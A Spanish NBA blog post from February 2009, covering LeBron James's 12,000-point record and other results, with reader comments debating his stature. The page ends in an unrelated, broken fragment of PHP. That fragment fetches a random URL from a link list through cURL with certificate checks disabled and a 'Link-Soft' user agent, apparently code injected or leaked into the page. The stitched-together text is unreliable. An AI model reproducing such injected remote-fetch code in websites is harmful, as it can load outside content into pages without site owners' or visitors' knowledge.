La crónica (03/02/2009)

04 de February de 2009 por txusma

Nos encontramos ante un fenómeno único en la historia y es que la magnitud de Lebron es algo que nos cuesta asimilar a muchos ya que vivimos inexplicablemente engañados por la cortina de cotidianidad y por la pasmosa facilidad con la que produce. ¿Porqué apenas nos maravillan sus hazañas cuando a duras penas están al alcance de nuestros ídolos de toda la vida? Se trata de un caso que literalmente merece un estudio.

Apenas es noticia que ayer, “King” James” pulverizara el récord de precocidad a la hora de alcanzar los 12.000 puntos. Exactamente 550 días antes que un tal Kobe Bryant. Para evitar más sustos recomendamos no visitar su tabla de estadísticas.

Al margen de la somanta que les dieron los Cavs a Toronto en el peor partido de Calderón, los Celtics comenzaban su estresante calendario en la difícil plaza del Wachovia Center en Philadelphia sin “Big Ticket”. Con el partido perdido Paul Pierce se las arregló para fabricar un tiro claro a Ray Allen a 0.5 segundos para el final, unas cuantas décimas de sobra para llevarse la 12ª consecutiva. Es lo que tiene ser tan buenos.

Por su parte los Spurs viajaron a Denver sin Duncan, Parker, Ginobili, ni Finley y tal y como están las cosas hoy en día, eso parece muerte clara. Lo curioso es que con Roger Mason a la cabeza y un tal Hairston únicamente perdieron de 8.

En el resto de la jornada, los Rockets en casa y al completo sufrieron para vencer a los Bulls, los Bucks hincaron la rodilla contra unos Nets liderados por la asombrosa pareja Brook&Anderson y los Timberwolves sorprendieron a Indiana en su casa. Para que luego nos cuestionemos que cómo es posible que estén tan abajo.

PREMIOS

MVP: Cuando un jugador hace un triple-doble lo normal es que sea nominado ipsofacto MVP de la jornada pero el 3 de 12 en tiro de Vince Carter nos hace dudar durante un segundo. Al final los 10 rebotes y 12 asistencias adicionales decantan la balanza a su favor por encima de los 29 puntos, 7 rebotes y 6 asistencias de Paul Pierce.

El Rookie: Partido muy completo de Derrick Rose con 12 puntos, 7 rebotes y 7 asistencias pero el galardón se lo otorgamos a Brook Lopez que con la actuación de ayer (22 puntos, 12 rebotes, 3 tapones y 10 de 14 en tiro) unida a la de partidos anteriores presenta su candidatura para rookie del año. No podemos olvidar tampoco los 19 puntos y 7 rebotes de Ryan Anderson que aprovecha con nota los minutos de los que dispone.

La sorpresa: Imaginad que espero con ansia el partido que el equipo de mi ciudad ha de jugar contra los Spurs y que tengo las entradas compradas desde hace muchísimo tiempo. ¿Qué cara se me quedaría si al llegar al pabellón compruebo que ni Duncan, ni Parker ni Ginobili están listos para jugar? Pues seguro que eso le pasó a algún ciudadano de Denver que tuvo que ver como Popovich decidió dar descanso a sus 3 estrellas. Y hablando de los Spurs… ¿quién dices que es ese Hairston que ha anotado 12 puntos?

La decepción: Horrendo partido el de Calderón anoche: 2 puntos, 3 rebotes, 6 asistencias, 3 pérdidas, 1 de 9 en tiros… Así no vamos a ir a Phoenix.

El mayor esfuerzo en vano: Además de a un clásico como Danny Granger hay que destacar esta vez a Chris Bosh con 29 puntos. Eso sí, sólo capturó 3 rebotes.

La pregunta del día: ¿Creéis que Lebron James está infravalorado en cuanto a su rendimiento estadístico se refiere?

Comenta

11 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Ayer antes de acostarme vi el primer cuarto de los Cavs-Raptors, hizo 16 puntos en menos de 8 minutos…. Con una superioridad de otro planeta, y sumando la pachorra que tienen los Raptors…parecia que jugaba un cadete en un partido de alevines….

    En su contra, su poco elegante manejo y bote de balón y que los arbitros le permiten una gran cantidad de pasos y dobles, que todo el mundo vemos….

    Tambien destacar a Ray Allen, la elegencia en estado puro, que dos triples metió ayer para darles el partido a los Celtics….

      Citar

  2. Viva_Dirk dice:
    #2

    Yo no creo que Lebron este infravalorado ni de lejos, su rendimiento estadistico es brutal, pero incluso después de la retirada de Jordan hay actuaciones individuales similares o superiores a su temporada actual. Estos 2 se llevaron el MVP:

    Shaq, temporada 99/00: 30 puntos, 13.6 rebotes, 3.8 asistencias, 3 tapones y 57.4% de tiro.

    Garnett, temporada 03/04: 24 puntos, 14 rebotes, 5 asistencias, 1.5 robos, 2 tapones y 50% en tiros.

    Y estos, aunque nadie sabe porque, no se lo llevaron:

    Webber, temporada 00/01: 27 puntos, 11 rebotes, 4.2 asistencias, mas de un robos y un tapón.

    Kobe, temporada 05/06: 35.4 puntos, 5.3 rebotes, 4.5 asistencias y casi 2 robos.

    McGrady, temporada 02/03: 32 puntos, 6.5 rebotes, 5.5 asistencias y 1.6 robos.

    Vamos, que Lebron si los Cavs acaban con el primer o segundo record del Oeste es el máximo aspirante al MVP, pero para darle como dominador absoluto de la liga deberá hacer algo mas que números.

      Citar

  3. MagicJohnson32 dice:
    #3

    Buuuufffff, vaya error de Thaddeus Young en el triple de Allen, cómo puedes ser tan burro cuando vas ganado por 2 puntos, de dejar la marca de Allen para ir a ayudar en una penetración…

    No, no, LeBron está valoradísimo. Y si hablamos de estadísticas… son cosas diferentes. El valor de un jugador no se mide por estadísticas, por mucho que éstas nos den una idea aproximada. Hay muchos aspectos del juego que no se reflejan en la estadística, y un rebote, una asistencia, un robo, un tapón o incluso una canasta no siempre tienen el mismo valor.

      Citar

  4. TheDeerHunter dice:
    #4

    A ver…
    por un lado y hablando de estadísticas, las que ha puesto Viva son bestiales y ciertamente quienes hemos podido seguir esos jugadores sabemos lo que representan…
    (juer, sólo de pensar en la 99/00 de Shaq… uffff)
    Sin embargo, no bromeaba con el susto de los números de Lebron… aún siguiendolo habitualmente me he quedado impresionado cuando los he visto todos juntos. Diría que como estadísticas en si son superiores a todas esas. Ahí es nada. Y parto de la base que el jugador todavía es joven (en teoría con margen de mejora)

    Después… en efecto, los números no lo son todo, como bien dice Magic, pero eso no le quita ni un pelo de mérito a lo que hace Lebron y la impresión que da cuando lo ves jugar es exáctamente lo que mencionaba Kantonyo, que es un cadete jugando contra alevines.
    Francamente impresiona…

    Lo que yo quería reflejar, no es tanto una infravaloración propiamente dicha… pero tenéis que admitir que por cotidiano apenas nos damos cuenta de la magnitud de lo que está haciendo.

    Por el lado negativo… también es cierto el detalle ese de lo tosco que es. No tiene la gracia estética que un Kobe, Jordan, Bird… es más fuerza brutal. Una especie de Shaquille metido en el cuerpo de un alero.

      Citar

  5. arivas dice:
    #5

    Coincido en lo que dice Theer, es que es un abusón. Parece que juega contra gente inferior a él, contra juniors con lo que nos parece que es normal que haga lo que hace.
    Pero vamos los numeros que tiene para tener solo 24 añitos son tremendos. El record de hoy será complicado de superar.

      Citar

  6. underlock dice:
    #6

    A mi también me parece descomunal lo que hace LeBron en la cancha, va a fulminar todos los records y la guinda será cuando consiga el anillo, que no creo que llegue este año todavia.

    De todas maneras, a mi modo de ver disfruto más viendo jugar a Wade y a Kobe, antes que a James, cosa que no quita que este último sea un jugadorazo que ya hace tiempo esta marcando una época en la NBA.

      Citar

  7. Txusma dice:
    #7

    Si hay un jugador capaz de acabar la temporada promediando un triple-doble ese es , sin duda, Lebron.

      Citar

  8. Jabho dice:
    #8

    Yo soy cada día más lebronista. Los números son de escándalo pero además la sensación viéndole jugar es que ya domina, antes no lo hacia o lo hacia menos, muchos de los aspectos del juego y de los partidos.

    Diría que se le valora bien, pero que siguiente paso lo tiene que dar ganando anillos. Ahora nadie duda de que es uno de los 2 o 3 mejores jugadores del mundo. Eso lo sabemos y se lo reconocemos. El siguiente paso a ser uno de los mejores de la historia (de los 4 o 5 mejores) lo dará, si lo da, ganado títulos. Sin anillos en su carrera no habrá comparaciones con los jordans, magics, birds o quién queramos poner. Yo creo que va madurando su juego y creo que ganará. Además creo que será pronto, este año o el que viene… veremos

      Citar

  9. Olafur dice:
    #9

    Como dice Deer es como un Shaquille o un Dwight Howard en el cuerpo de un alero, y la falta de finura en su juego hace que no sea de los mas vistosos, pero la verdad es que analizas friamente lo que hace y es fliplante con la edad que tiene

      Citar

  10. toni dice:
    #10

    Lo del shaquille en cuerpo de alero es una gran comparacion y teneis razon yo disfruto mas viendo a flash que a leBron, me gustaria ver un miami-cavs aunqe seria como un tenis, wade se la jugaria y leB le contestaria pero seria un espectacular mano a mano, seguramente ganaria cleveland por tener a mo williams o a Ilgauscas(perdonad si esta mal escrito).
    Calde penoso ayer aunqe me guste mucho su forma de jugar de hecho pienso que podria estar en el allstar aunqe veo mas a harris que a otro.
    Pau sigue a lo suyo, que se lesiona Bynum, sin problemas, entre él y kobe suplen sus 20 puntos, lo que no me hicieron gracia fueron los 6pts de Odom… los lakers lo necesitan y lo sabe.
    pd: Hoy no hay razones para trasnochar? jaja
    Destacaria el bulls-hornets con Deng enrachado y sin CP3 me gustaria levantarme y ver como West ha metido 30 puntos(que haya cojido la responsabilidad).
    Buenos analisis los de esta página.

      Citar

  11. cinedine dice:
    #11

    Bueno creo que esta noche a callado a los que no confian en king games, menudo triple doble!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>